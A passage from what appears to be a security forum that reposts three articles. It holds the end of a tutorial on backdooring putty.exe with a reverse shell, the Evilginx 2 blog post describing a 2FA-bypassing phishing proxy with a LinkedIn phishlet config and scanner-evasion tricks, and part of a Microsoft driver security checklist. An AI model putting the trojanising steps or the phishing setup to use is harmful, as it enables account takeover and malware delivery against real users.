0018FD6C Now allign stack by adding this value to esp . After restoring save the newly modified executable and listen on netcat for reverse connection. As soon as I started putty,it got stuck and didn't open until I closed the reverse connection . This is due to a function called WaitforSingleObject used in msfvenom shellcodes. Here is a nice article on the same and how to fix this - https://simonuvarov.com/msfvenom-reverse-tcp-waitforsingleobject/ Msfvenom shellcode uses INFINITE as a value for the dwMilliseconds parameter. Fixing the waitforsingleobject problem by making dwMilliseconds parameter value to 0 from -1(due to dec esi instruction which I replaced using NOP) - Once It is fixed save the executable and you are good to Go .. !!!!!!!!!!!!!!!! POC- As soon as I open putty.exe it gave a reverse shell and at the same time working perfectly like a charm. Thanks for reading ..Happy Hacking .. Sursa: http://www.theanuragsrivastava.in/2018/07/backdoring-pe-files-using-code-caves.html?m=1
-
Evilginx 2 - Next Generation of Phishing 2FA Tokens 26 July 2018 on evilginx, mitm, security, phishing, research, golang, 2fa, tool It's been over a year since the first release of Evilginx and looking back, it has been an amazing year. I've received tons of feedback, got invited to WarCon by @antisnatchor (thanks man!) and met amazing people from the industry. A year ago, I wouldn't have even expected that one day Kevin Mitnick would showcase Evilginx in his live demos around the world and Techcrunch would write about it! At WarCon I met the legendary @evilsocket (he is a really nice guy), who inspired me with his ideas to learn GO and rewrite Evilginx as a standalone application. It is amazing how GO seems to be ideal for offensive tools development and bettercap is its best proof! This is where Evilginx is now. No more nginx, just pure evil. My main goal with this tool's release was to focus on minimizing the installation difficulty and maximizing the ease of use. Usability was not necessarily the strongest point of the initial release. Updated instructions on usage and installation can always be found up-to-date on the tool's official GitHub project page. In this blog post I only want to explain some general concepts of how it works and its major features. TL;DR What am I looking at? Evilginx is an attack framework for setting up phishing pages. Instead of serving templates of sign-in pages lookalikes, Evilginx becomes a relay between the real website and the phished user. Phished user interacts with the real website, while Evilginx captures all the data being transmitted between the two parties. Evilginx, being the man-in-the-middle, captures not only usernames and passwords, but also captures authentication tokens sent as cookies. Captured authentication tokens allow the attacker to bypass any form of 2FA enabled on user's account (except for U2F - more about it further below). Even if phished user has 2FA enabled, the attacker, outfitted with just a domain and a VPS server, is able to remotely take over his/her account. It doesn't matter if 2FA is using SMS codes, mobile authenticator app or recovery keys. Take a look at the video demonstration, showing how attacker's can remotely hack an Outlook account with enabled 2FA. Disclaimer: Evilginx project is released for educational purposes and should be used only in demonstrations or legitimate penetration testing assignments with written permission from to-be-phished parties. Goal is to show that 2FA is not a silver bullet against phishing attempts and people should be aware that their accounts can be compromised, nonetheless, if they are not careful. >> Download Evilginx 2 from GitHub << Remember - 2FA is not a silver bullet against phishing! 2FA is very important, though. This is what head of Google Threat Intelligence had to say on the subject: Old phishing tactics Common phishing attacks, we see every day, are HTML templates, prepared as lookalikes of popular websites' sign-in pages, luring victims into disclosing their usernames and passwords. When the victim enters his/her username and password, the credentials are logged and attack is considered a success. This is where 2FA steps in. If phished user has 2FA enabled on their account, the attacker would require an additional form of authentication, to supplement the username and password they intercepted through phishing. That additional form of authentication may be SMS code coming to your mobile device, TOTP token, PIN number or answer to a question that only the account owner would know. Attacker not having access to any of these will never be able to successfully authenticate and login into victim's account. Old phishing methods which focus solely on capturing usernames and passwords are completely defeated by 2FA. Phishing 2.0 What if it was possible to lure the victim not only to disclose his/her username and password, but also to provide the answer to any 2FA challenge that may come after the credentials are verified? Intercepting a single 2FA answer would not do the attacker any good. Challenge will change with every login attempt, making this approach useless. After each successful login, website generates an authentication token for the user's session. This token (or multiple tokens) is sent to the web browser as a cookie and is saved for future use. From that point, every request sent from the browser to the website will contain that session token, sent as a cookie. This is how websites recognize authenticated users after successful authentication. They do not ask users to log in, every time when page is reloaded. This session token cookie is pure gold for the attacker. If you export cookies from your browser and import them into a different browser, on a different computer, in a different country, you will be authorized and get full access to the account, without being asked for usernames, passwords or 2FA tokens. This is what it looks like, in Evilginx 2, when session token cookie is successfully captured: Now that we know how valuable the session cookie is, how can the attacker intercept it remotely, without having physical access to the victim's computer? Common phishing attacks rely on creating HTML templates which take time to make. Most work is spent on making them look good, being responsive on mobile devices or properly obfuscated to evade phishing detection scanners. Evilginx takes the attack one step further and instead of serving its own HTML lookalike pages, it becomes a web proxy. Every packet, coming from victim's browser, is intercepted, modified and forwarded to the real website. The same happens with response packets, coming from the website; they are intercepted, modified and sent back to the victim. With Evilginx there is no need to create your own HTML templates. On the victim side everything looks as if he/she was communicating with the legitimate website. User has no idea idea that Evilginx sits as a man-in-the-middle, analyzing every packet and logging usernames, passwords and, of course, session cookies. You may ask now, what about encrypted HTTPS connection using SSL/TLS that prevents eavesdropping on the communication data? Good question. Problem is that the victim is only talking, over HTTPS, to Evilginx server and not the true website itself. Evilginx initiates its own HTTPS connection with the victim (using its own SSL/TLS certificates), receives and decrypts the packets, only to act as a client itself and establish its own HTTPS connection with the destination website, where it sends the re-encrypted packets, as if it was the victim's browser itself. This is how the trust chain is broken and the victim still sees that green lock icon next to the address bar, in the browser, thinking that everyone is safe. When the victim enters the credentials and is asked to provide a 2FA challenge answer, they are still talking to the real website, with Evilginx relaying the packets back and forth, sitting in the middle. Even while being phished, the victim will still receive the 2FA SMS code to his/her mobile phone, because he/she is talking to the real website (just through a relay). After the 2FA challenge is completed by the victim and the website confirms its validity, website generates the session token, which it returns in form of a cookie. This cookie is intercepted by Evilginx and saved. Evilginx determines that authentication was a success and redirects the victim to any URL it was set up with (online document, video etc.). At this point the attacker holds all the keys to the castle and is able to use the victim's account, fully bypassing 2FA protection, after importing the session token cookies into his web browser. Be aware that: Every sign-in page, requiring the user to provide their password, with any form of 2FA implemented, can be phished using this technique! How to protect yourself? There is one major flaw in this phishing technique that anyone can and should exploit to protect themselves - the attacker must register their own domain. By registering a domain, attacker will try to make it look as similar to real, legitimate domain as possible. For example if the attacker is targeting Facebook (real domain is facebook.com), they can, for example, register a domain faceboook.com or faceb00k.com, maximizing their chances that phished victims won't spot the difference in the browser's address bar. That said - always check the legitimacy of website's base domain, visible in the address bar, if it asks you to provide any private information. By base domain I mean the one that precedes the top-level domain. As an example, imagine this is the URL and the website, you arrived at, asks you to log into Facebook: https://en-gb.facebook.cdn.global.faceboook.com/login.php Language The top-level domain is .com and the base domain would be the preceeding word, with next . as a separator. Combined with TLD, that would be faceboook.com. When you verify that faceboook.com is not the real facebook.com, you will know that someone is trying to phish you. As a side note - Green lock icon seen next to the URL, in the browser's address bar, does not mean that you are safe! Green lock icon only means that the website you've arrived at, encrypts the transmission between you and the server, so that no-one can eavesdrop on your communication. Attackers can easily obtain SSL/TLS certificates for their phishing sites and give you a false sense of security with the ability to display the green lock icon as well. Figuring out if the base domain you see is valid, sometimes may not be easy and leaves room for error. It became even harder with the support of Unicode characters in domain names. This made it possible for attackers to register domains with special characters (e.g. in Cyrillic) that would be lookalikes of their Latin counterparts. This technique recieved a name of a homograph attack. As a quick example, an attacker could register a domain facebooĸ.com, which would look pretty convincing even though it was a completely different domain name (ĸ is not really k). It got even worse with other Cyrillic characters, allowing for ebаy.com vs ebay.com. The first one has an Cyrillic counterpart for a character, which looks exactly the same. Major browsers were fast to address the problem and added special filters to prevent domain names from being displayed in Unicode, when suspicious characters were detected. If you are interested in how it works, check out the IDN spoofing filter source code of the Chrome browser. Now you see that verifying domains visually is not always the best solution, especially for big companies, where it often takes just one employee to get phished and allow attackers to steal vast amounts of data. This is why FIDO Alliance introduced U2F (Universal 2nd Factor Authentication) to allow for unphishable 2nd factor authentication. In short, you have a physical hardware key on which you just press a button when the website asks you to. Additionally it may ask you for account password or a complementary 4 digit PIN. The website talks directly with the hardware key plugged into your USB port, with the web browser as the channel provider for the communication. What is different with this form of authentication, is that U2F protocol is designed to take the website's domain as one of the key components in negotiating the handshake. This means that if the domain in the browser's address bar, does not match the domain used in the data transmission between the website and the U2F device, the communication will simply fail. This solution leaves no room for error and is totally unphishable using Evilginx method. Citing the vendor of U2F devices - Yubico (who co-developed U2F with Google): With the YubiKey, user login is bound to the origin, meaning that only the real site can authenticate with the key. The authentication will fail on the fake site even if the user was fooled into thinking it was real. This greatly mitigates against the increasing volume and sophistication of phishing attacks and stops account takeovers. It is important to note here that Markus Vervier (@marver) and Michele Orrù (@antisnatchor) did demonstrate a technique on how an attacker can attack U2F devices using the newly implemented WebUSB feature in modern browsers (which allows websites to talk with USB connected devices). It is also important to mention that Yubico, the creator of popular U2F devices YubiKeys, tried to steal credit for their research, which they later apologized for. You can find the list of all websites supporting U2F authentication here. Coinciding with the release of Evilginx 2, WebAuthn is coming out in all major web browsers. It will introduce the new FIDO2 password-less authentication standard to every browser. Chrome, Firefox and Edge are about to receive full support for it. To wrap up - if you often need to log into various services, make your life easier and get a U2F device! This will greatly improve your accounts' security. Under the hood Interception of HTTP packets is possible since Evilginx acts as an HTTP server talking to the victim's browser and, at the same time, acts as an HTTP client for the website where the data is being relayed to. To make it possible, the victim has to be contacting Evilginx server through a custom phishing URL that will point to Evilginx server. Simply forwarding packets from victim to destination website would not work well and that's why Evilginx has to do some on-the-fly modifications. In order for the phishing experience to be seamless, the proxy overcomes the following obstacles: 1. Making sure that the victim is not redirected to phished website's true domain. Since the phishing domain will differ from the legitimate domain, used by phished website, relayed scripts and HTML data have to be carefully modified to prevent unwanted redirection of victim's web browser. There will be HTML submit forms pointing to legitimate URLs, scripts making AJAX requests or JSON objects containing URLs. Ideally the most reliable way to solve it would be to perform regular expression string substitution for any occurrence of https://legit-site.com and replacing it with https://our-phishing-site.com. Unfortunately this is not always the case and it requires some trial and error kung-fu, working with web inspector to track down all strings the proxy needs to replace to not break website's functionality. If target website uses multiple options for 2FA, each route has to be inspected and analyzed. For example, there are JSON objects transporting escaped URLs like https:\/\/legit-site.com. You can see that this will definitely not trigger the regexp mentioned above. If you replaced all occurrences of legit-site.com you may break something by accident. 2. Responding to DNS requests for multiple subdomains. Websites will often make requests to multiple subdomains under their official domain or even use a totally different domain. In order to proxy these transmissions, Evilginx has to map each of the custom subdomains to its own IP address. Previous version of Evilginx required the user to set up their own DNS server (e.g. bind) and set up DNS zones to properly handle DNS A requests. This generated a lot of headache on the user part and was only easier if the hosting provider (like Digital Ocean) provided an easy-to-use admin panel for setting up DNS zones. With Evilginx 2 this issue is gone. Evilginx now runs its own in-built DNS server, listening on port 53, which acts as a nameserver for your domain. All you need to do is set up the nameserver addresses for your domain (ns1.yourdomain.com and ns2.yourdomain.com) to point to your Evilginx server IP, in the admin panel of your domain hosting provider. Evilginx will handle the rest on its own. 3. Modification of various HTTP headers. Evilginx modifies HTTP headers sent to and received from the destination website. In particular the Origin header, in AJAX requests, will always hold the URL of the requesting site in order to comply with CORS. Phishing sites will hold a phishing URL as an origin. When request is forwarded, the destination website will receive an invalid origin and will not respond to such request. Not replacing the phishing hostname with the legitimate one in the request would make it also easy for the website to notice suspicious behavior. Evilginx automatically changes Origin and Referer fields on-the-fly to their legitimate counterparts. Same way, to avoid any conflicts with CORS from the other side, Evilginx makes sure to set the Access-Control-Allow-Origin header value to * (if it exists in the response) and removes any occurrences of Content-Security-Policy headers. This guarantees that no request will be restricted by the browser when AJAX requests are made. Other header to modify is Location, which is set in HTTP 302 and 301 responses to redirect the browser to different location. Naturally the value will come with legitimate website URL and Evilginx makes sure this location is properly switched to corresponding phishing hostname. 4. Cookies filtering. It is common for websites to manage cookies for various purposes. Each cookie is assigned to a specific domain. Web browser's task is to automatically send the stored cookie, with every request to the domain, the cookie was assigned to. Cookies are also sent as HTTP headers, but I decided to make a separate mention of them here, due to their importance. Example cookie sent from the website to client's web browser would look like this: Set-Cookie: qwerty=219ffwef9w0f; Domain=legit-site.com; Path=/; Expires=Wed, 30 Aug 2019 00:00:00 GMT HTTP As you can see the cookie will be set in client's web browser for legit-site.com domain. Since the phishing victim is only talking to the phishing website with domain our-phishing-site.com, such cookie will never be saved in the browser, because of the fact the cookie domain differs from the one the browser is communicating with. Evilginx will parse every occurrence of Set-Cookie in HTTP response headers and modify the domain, replacing it with the phishing one, as follows: Set-Cookie: qwerty=219ffwef9w0f; Domain=our-phishing-site.com; Path=/; HTTP Evilginx will also remove expiration date from cookies, if the expiration date does not indicate that the cookie should be deleted from browser's cache. Evilginx also sends its own cookies to manage the victim's session. These cookies are filtered out from every HTTP request, to prevent them from being sent to the destination website. 5. SSL splitting. As the whole world of world-wide-web migrates to serving pages over secure HTTPS connections, phishing pages can't be any worse. Whenever you pick a hostname for your phishing page (e.g. totally.not.fake.linkedin.our-phishing-domain.com), Evilginx will automatically obtain a valid SSL/TLS certificate from LetsEncrypt and provide responses to ACME challenges, using the in-built HTTP server. This makes sure that victims will always see a green lock icon next to the URL address bar, when visiting the phishing page, comforting them that everything is secured using "military-grade" encryption! 6. Anti-phishing tricks There are rare cases where websites would employ defenses against being proxied. One of such defenses I uncovered during testing is using javascript to check if window.location contains the legitimate domain. These detections may be easy or hard to spot and much harder to remove, if additional code obfuscation is involved. Improvements The greatest advantage of Evilginx 2 is that it is now a standalone console application. There is no need to compile and install custom version of nginx, which I admit was not a simple feat. I am sure that using nginx site configs to utilize proxy_pass feature for phishing purposes was not what HTTP server's developers had in mind, when developing the software. Evilginx 1 was pretty much a combination of several dirty hacks, duct taped together. Nonetheless it somehow worked! Additionally to fully responsive console UI, here are the greatest improvements: Tokenized phishing URLs In previous version of Evilginx, entering just the hostname of your phishing URL address in the browser, with root path (e.g. https://totally.not.fake.linkedin.our-phishing-domain.com/), would still proxy the connection to the legitimate website. This turned out to be an issue, as I found out during development of Evilginx 2. Apparently once you obtain SSL/TLS certificates for the domain/hostname of your choice, external scanners start scanning your domain. Scanners gonna scan. The scanners use public certificate transparency logs to scan, in real-time, all domains which have obtained valid SSL/TLS certifcates. With public libraries like CertStream, you can easily create your own scanner. For some phishing pages, it took usually one hour for the hostname to become banned and blacklisted by popular anti-spam filters like Spamhaus. After I had three hostnames blacklisted for one domain, the whole domain got blocked. Three strikes and you're out! I began thinking how such detection can be evaded. Easiest solution was to reply with faked response to every request for path /, but that would not work if scanners probed for any other path. Then I decided that each phishing URL, generated by Evilginx, should come with a unique token in the URL as a GET parameter. For example, Evilginx responds with redirection response when scanner makes a request to URL: https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin Language But it responds with proxied phishing page, instead, when the URL is properly tokenized, with a valid token: https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin?tk=secret_l33t_token Language When tokenized URL is opened, Evilginx sets a validation cookie in victim's browser, whitelisting all subsequent requests, even for the non-tokenized ones. This works very well, but there is still risk that scanners will eventually scan tokenized phishing URLs when these get out into the interwebz. Hiding your phishlets This thought provoked me to find a solution that allows manual control over when the phishing proxy should respond with proxied website and when it should not. As a result, you can hide and unhide the phishign page whenever you want. Hidden phishing page will respond with a redirection 302 HTTP code, redirecting the requester to predefined URL (Rick Astley's famous clip on Youtube is the default). Temporarily hiding your phishlet may be useful when you want to use a URL shortener, to shorten your phishing URL (like goo.gl or bit.ly) or when you are sending the phishing URL via email and you don't want to trigger any email scanners, on the way. Phishlets Phishlets are new site configs. They are plain-text ruleset files, in YAML format, which are fed into the Evilginx engine. Phishlets define which subdomains are needed to properly proxy a specific website, what strings should be replaced in relayed packets and which cookies should be captured, to properly take over the victim's account. There is one phishlet for each phished website. You can deploy as many phishlets as you want, with each phishlet set up for a different website. Phishlets can be enabled and disabled as you please and at any point Evilginx can be running and managing any number of them. I will do a better job than I did last time, when I released Evilginx 1, and I will try to explain the structure of a phishlet and give you brief insight into how phishlets are created (I promise to release a separate blog post about it later!). I will dissect the LinkedIn phishlet for the purpose of this short guide: name: 'linkedin' author: '@mrgretzky' min_ver: '2.0.0' proxy_hosts: - { phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true } sub_filters: - { hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json'] } - { hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json'] } - { hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: '//{hostname}/nhome/', replace: '//{hostname}/nhome/', mimes: ['text/html', 'application/json'] } auth_tokens: - domain: 'www.linkedin.com' keys: ['li_at'] user_regex: key: 'session_key' re: '(.*)' pass_regex: key: 'session_password' re: '(.*)' landing_path: - '/uas/login' YAML First things first. I advise you to get familiar with YAML syntax to avoid any errors when editing or creating your own phishlets. Starting off with simple and rather self-explanatory variables. name is the name of the phishlet, which would usually be the name of the phished website. author is where you can do some self promotion - this will be visible in Evilginx's UI when the phishlet is loaded. version is currently not supported, but will be very likely used when phishlet format changes in future releases of Evilginx, to provide some way of checking phishlet's compatibility with current tool's version. Following that, we have proxy_hosts. This array holds an array of sub-domains that Evilginx will manage. This provides an array of all hostnames for which you want to intercept the transmission and gives you the capability to make on-the-fly packet modifications. phish_sub : subdomain name that will be prefixed in the phishlet's hostname. I advise to leave it the same as the original subdomain name, due to issues that may arise later when doing string replacements properly, as it often requires additional work to support custom subdomain names. orig_sub : the original subdomain name as used on the legitimate website. domain : website's domain that we are targeting. session : set this to true ONLY for subdomains that will return authentication cookies. This indicates which subdomain Evilginx should recognize as the one that will initiate the creation of Evilginx session and sets Evilginx session cookie for the domain name of this entry. is_landing : set this to true if you want this subdomain to be used in generation of phishing URLs later. In the LinkedIn example, we only have one subdomain that we need to support, which is www. The phishing hostname for this subdomain will then be: www.totally.not.fake.linkedin.our-phishing-domain.com. Next are sub_filters, which tell Evilginx all about string substitution magics. hostname : original hostname of the website, for which the substitution will take place. sub : subdomain name from the original hostname. This is will be only used as a helper string in substitutions that I will explain below. domain : domain name of the original hostname. Same as sub - used as a helper string in substitutions. search : the regular expression of what to search for in HTTP packet's body. You can use some variables in {...} that Evilginx will prefill for you. I listed all supported variables below. replace : the string that will act as a replacement for all occurrences of search regular expression matches. {...} variables are also supported here. mimes : an array of MIME types that will only be considered before doing search and replace. Any of these defined MIME types must show up in Content-Type header of the HTTP response, before Evilginx considers to do any substitutions, for that packet. Most common MIME types to use here are: text/html, application/json, application/javascript or text/javascript. redirect_only : use this sub_filter only if redirection URL is set in generated phishing URL (true or false). The following is a list of bracket variables that you can use in search and replace parameters: {hostname} : a combination of subdomain, defined by sub parameter, and a domain, defined by domain parameter. In search field it will be translated to the original website's hostname (e.g. www.linkedin.com). In the replace field, it will be translated to corresponding phishing hostname of matching proxy_hosts entry (e.g. www.totally.not.fake.linkedin.our-phishing-domain.com). {subdomain} : same as {hostname} but only for the subdomain. {domain} : same as {hostname} but only for the domain. {domain_regexp} : same as {domain} but translates to properly escaped regular expression string. This can sometimes be useful when replacing anti-phishing protections in javascript, that try to verify if window.location contains the legitimate domain. {hostname_regexp} : same as above, but for the hostname. {subdomain_regexp} : same as above, but for the subdomain. In the example we have: - { hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json'] } YAML This will make Evilginx search for packets with Content-Type of text/html or application/json and look for occurrences of action="https://www\.linkedin\.com (properly escaped regexp). If found, it will replace every occurrence with action="https://www.totally.not.fake.linkedin.our-phishing-domain.com. As you can see this will replace the action URL of the login HTML form to have it point to Evilginx server, so that the victim does not stray off the phishing path. That was the most complicated part. Now it should be pretty straight forward. Next up are auth_tokens. This is where you define the cookies that should be captured on successful login, which combined together provide the full state of the website's captured session. The cookies defined here, when obtained, can later be imported to any browser (using this extension in Chrome) and allow to be immediately logged into the victim's account, bypassing any 2FA challenges. domain : original domain for which the cookies will be saved for. keys : array of cookie names that should be captured. In the example, there is only one cookie that LinkedIn uses to verify the session's state. Only li_at cookie, saved for www.linkedin.com domain will be captured and stored. Once Evilginx captures all of the defined cookies, it will display a message that authentication was successful and will store them in the database. The two following parameters are similar user_regex and pass_regex. These define the POST request keys that should be searched for occurrences of usernames and passwords. Searching is defined by a regular expression that is ran against the contents of the POST request's key value. key : name of the POST request key. re : regular expression defining what data should be captured from the key's value (e.g. (.*) will capture the whole value) Last parameter is landing_path array, which holds URL paths to login pages (usually one), of the phished website. In our example, there is /uas/login which would translate to https://www.totally.not.fake.linkedin.our-phishing-domain.com/uas/login for the generated phishing URL. Hope that sheds some light on how you can create your own phishlets and should help you understand the ones that are already shipped with Evilginx in the ./phishlets directory. Future development I'd like to continue working on Evilginx 2 and there are some things I have in mind that I want to eventually implement. One of such things is serving an HTML page instead of 302 redirect for hidden phishlets. This could be a page imitating CloudFlare's "checking your browser" that would wait in a loop and redirect, to the phishing page, as soon as you unhide your phishlet. Another thing to have at some point is to have Evilginx launch as a daemon, without the UI. Business Inquiries If you are a red teaming company interested in development of custom phishing solutions, drop me a line and I will be happy to assist in any way I can. If you are giving presentations on flaws of 2FA and/or promoting the use of FIDO U2F/FIDO2 devices, I'd love to hear how Evilginx can help you raise awareness. In any case, send me an email at: kuba@breakdev.org I'll respond as soon as I can! Credits Since the release of Evilginx 1, in April last year, a lot has changed in my life for the better. I met a lot of wonderful, talented people, in front of whom I could exercise my impostor syndrome! I'd like to thank few people without whom this release would not have been possible: @evilsocket - for letting me know that Evilginx is awesome, inspiring me to learn GO and for developing so many incredible products that I could steal borrow code from! @antisnatchor and @h0wlu - for organizing WarCon and for inviting me! @juliocesarfort and @Mario_Vilas - for organizing AlligatorCon and for being great reptiles! @x33fcon - for organizing x33fcon and letting me do all these lightning talks! Vincent Yiu (@vysecurity) - for all the red tips and invitations to secret security gatherings! Kevin Mitnick (@kevinmitnick) - for giving Evilginx a try and making me realize its importance! @i_bo0om - for giving me an idea to play with nginx's proxy_pass feature in his post. Cristofaro Mune (@pulsoid) & Denis Laskov (@it4sec) - for spending their precious time to hear out my concerns about releasing such tool to the public. Giuseppe "Ohpe" Trotta (@Giutro) - for a heads up that there may be other similar tools lurking around in the darkness #apt - everyone I met there, for sharing amazing contributions. Thank you! That's it! Thanks for being able to read this overly long post! Enjoy the tool and I'm waiting for your feedback! >> Follow me on Twitter << >> Download Evilginx 2 from GitHub << Kuba Gretzky I am a reverse engineer, security researcher and software developer. I develop offensive tools for red teams and look for software vulnerabilities in free time. Evilginx is my baby. Sursa: https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/
-
- 1
-
-
Driver security checklist 01/26/2018 29 minutes to read Contributors This article provides a driver security checklist for driver developers to help reduce the risk of drivers being compromised. Driver security overview A security flaw is any flaw that allows an attacker to cause a driver to malfunction in such a way that it causes the system to crash or become unusable. In addition, vulnerabilities in driver code can allow an attacker to gain access to the kernel, creating a possibility of compromising the entire OS. When most developers are working on their driver, their focus is on getting the driver to work properly, and not on whether a malicious attacker will attempt to exploit vulnerabilities within their code. After a driver is released, however, attackers can attempt to probe and identify security flaws. Developers must consider these issues during the design and implementation phase in order to minimize the likelihood of such vulnerabilities. The goal is to eliminate all known security flaws before the driver is released. Creating more secure drivers requires the cooperation of the system architect (consciously thinking of potential threats to the driver), the developer implementing the code (defensively coding common operations that can be the source of exploits), and the test team (proactively attempting to find weakness and vulnerabilities). By properly coordinating all of these activities, the security of the driver is dramatically enhanced. In addition to avoiding the issues associated with a driver being attacked, many of the steps described, such as more precise use of kernel memory, will increase the reliability of your driver. This will reduce support costs and increase customer satisfaction with your product. Completing the tasks in the checklist below will help to achieve all these goals. Security checklist: Complete the security task described in each of these topics. Confirm that a kernel driver is required Use the driver frameworks Control access to software only drivers Do not production sign test driver code Perform threat analysis Follow driver secure coding guidelines Validate Device Guard compatibility Follow technology specific code best practices Perform peer code review Manage driver access control Enhance device installation security Execute proper release driver signing Use code analysis in Visual Studio to investigate driver security Use Static Driver Verifier to Check for Vulnerabilities Check code with Binscope Binary Analyzer Use code validation tools Review debugger techniques and extensions Review secure coding resources Summary of key takeaways Confirm that a kernel driver is required Security checklist item #1: Confirm that a kernel driver is required and that a lower risk approach, such as Windows service or app, is not a better option. Drivers live in the Windows kernel, and having an issue when executing in kernel exposes the entire operating system. If any other option is available, it likely will be lower cost and have less associated risk than creating a new kernel driver. For more information about using the built in Windows drivers, see Do you need to write a driver?. For information on using background tasks, see Support your app with background tasks. For information on using Windows Services, see Services. Use the driver frameworks Security checklist item #2: Use the driver frameworks to reduce the size of your code and increase it's reliability and security. Use the Windows Driver Frameworks to reduce the size of your code and increase it's reliability and security. To get started, review Using WDF to Develop a Driver. For information on using the lower risk user mode framework driver (UMDF), see Choosing a driver model. Writing an old fashion Windows Driver Model (WDM) driver is more time consuming, costly, and almost always involves recreating code that is available in the driver frameworks. The Windows Driver Framework source code is open source and available on GitHub. This is the same source code from which the WDF runtime library that ships in Windows 10 is built. You can debug your driver more effectively when you can follow the interactions between the driver and WDF. Download it from http://github.com/Microsoft/Windows-Driver-Frameworks. Control access to software only drivers Security checklist item #3: If a software-only driver is going to be created, additional access control must be implemented. Software-only kernel drivers do not use plug-and-play (PnP) to become associated with specific hardware IDs, and can run on any PC. Such a driver could be used for purposes other than the one originally intended, creating an attack vector. Because software-only kernel drivers contain additional risk, they must be limited to run on specific hardware (for example, by using a unique PnP ID to enable creation of a PnP driver, or by checking the SMBIOS table for the presence of specific hardware). For example, imagine OEM Fabrikam wants to distribute a driver that enables an overclocking utility for their systems. If this software-only driver were to execute on a system from a different OEM, system instability or damage might result. Fabrikam’s systems should include a unique PnP ID to enable creation of a PnP driver that is also updatable through Windows Update. If this is not possible, and Fabrikam authors a Legacy driver, that driver should find another method to verify that it is executing on a Fabrikam system (for example, by examination of the SMBIOS table prior to enabling any capabilities). Do not production sign test code Security checklist item #4: Do not production code sign development, testing, and manufacturing kernel driver code. Kernel driver code that is used for development, testing, or manufacturing might include dangerous capabilities that pose a security risk. This dangerous code should never be signed with a certificate that is trusted by Windows. The correct mechanism for executing dangerous driver code is to disable UEFI Secure Boot, enable the BCD “TESTSIGNING”, and sign the development, test, and manufacturing code using an untrusted certificate (for example, one generated by makecert.exe). Code signed by a trusted Software Publishers Certificate (SPC) or Windows Hardware Quality Labs (WHQL) signature must not facilitate bypass of Windows code integrity and security technologies. Before code is signed by a trusted SPC or WHQL signature, first ensure it complies with guidance from both Device.DevFund.Reliability.BasicSecurity and Creating Reliable Kernel-Mode Drivers. In addition the code must not contain any dangerous behaviors, described below. For more information about driver signing, see Release driver signing later in this article. Examples of dangerous behavior include the following: Providing the ability to map arbitrary kernel, physical, or device memory to user mode. Providing the ability to read or write arbitrary kernel, physical or device memory, including Port input/output (I/O). Providing access to storage that bypasses Windows access control. Providing the ability to modify hardware or firmware that the driver was not designed to manage. Perform threat analysis Security checklist item #5: Either modify an existing driver threat model or create a custom threat model for your driver. In considering security, a common methodology is to create specific threat models that attempt to describe the types of attacks that are possible. This technique is useful when designing a driver because it forces the developer to consider the potential attack vectors against a driver in advance. Having identified potential threats, a driver developer can then consider means of defending against these threats in order to bolster the overall security of the driver component. This article provides driver specific guidance for creating a lightweight threat model: Threat modeling for drivers. The article provides an example driver threat model diagram that can be used as a starting point for your driver. Security Development Lifecycle (SDL) best practices and associated tools can be used by IHVs and OEMs to improve the security of their products. For more information see SDL recommendations for OEMs. Follow driver secure coding guidelines Security checklist item #6: Review your code and remove any known code vulnerabilities. The core activity of creating secure drivers is identifying areas in the code that need to be changed to avoid known software vulnerabilities. Many of these known software vulnerabilities deal with keeping strict track of the use of memory to avoid issues with others overwriting or otherwise comprising the memory locations that your driver uses. The Code Validation Tools section of this article describes software tools that can be used to help locate known software vulnerabilities. Memory buffers Always check the sizes of the input and output buffers to ensure that the buffers can hold all the requested data. For more information, see Failure to Check the Size of Buffers. Properly initialize all output buffers with zeros before returning them to the caller. For more information, see Failure to Initialize Output Buffers. Validate variable-length buffers. For more information, see Failure to Validate Variable-Length Buffers. For more information about working with buffers and using ProbeForRead and ProbeForWrite to validate the address of a buffer, see Buffer Handling. Use the appropriate method for accessing data buffers with IOCTLs One of the primary responsibilities of a Windows driver is transferring data between user-mode applications and a system's devices. The three methods for accessing data buffers are shown in the following table. IOCTL Buffer Type Summary For more information METHOD_BUFFERED Recommended for most situtations Using Buffered I/O METHOD_IN_DIRECT or METHOD_OUT_DIRECT Used in some high speed HW I/O Using Direct I/O METHOD_NEITHER Avoid if possible Using Neither Buffered Nor Direct I/O In general buffered I/O is recommended as it provides the most secure buffering methods. But even when using buffered I/O there are risks, such as embedded pointers that must be mitigated. For more information about working with buffers in IOCTLs, see Methods for Accessing Data Buffers. Errors in use of IOCTL buffered I/O Check the size of IOCTL related buffers. For more information, see Failure to Check the Size of Buffers. Properly initialize output buffers. For more information, see Failure to Initialize Output Buffers. Properly validate variable-length buffers. For more information, see Failure to Validate Variable-Length Buffers. When using buffered I/O, be sure and return the proper length for the OutputBuffer in the IO_STATUS_BLOCK structure Information field. Don't just directly return the length directly from a READ request. For example, consider a situation where the returned data from the user space indicates that there is a 4K buffer. If the driver actually should only return 200 bytes, but instead just returns 4K in the Information field an information disclosure vulnerability has occurred. This problem occurs because in earlier versions of Windows, the buffer the I/O Manager uses for Buffered I/O is not zeroed. Thus, the user app gets back the original 200 bytes of data plus 4K-200 bytes of whatever was in the buffer (non-paged pool contents). This scenario can occur with all uses of Buffered I/O and not just with IOCTLs. Errors in IOCTL direct I/O Handle zero-length buffers correctly. For more information, see Errors in Direct I/O. Errors in referencing user-space addresses Validate pointers embedded in buffered I/O requests. For more information, see Errors in Referencing User-Space Addresses. Validate any address in the user space before trying to use it, using APIs such as ProbeForRead and ProbeForWrite when appropriate. TOCTOU vulnerabilities There is a potential time of check to time of use (TOCTOU) vulnerability when using direct I/O (for IOCTLs or for Read/Write). Be aware that the driver is accessing the user data buffer, the user can simultaneously be accessing it. To manage this risk, copy any parameters that need to be validated from the user data buffer to memory that is solely accessibly from kernel mode (such as the stack or pool). Then once the data can not be accessed by the user application, validate and then operate on the data that was 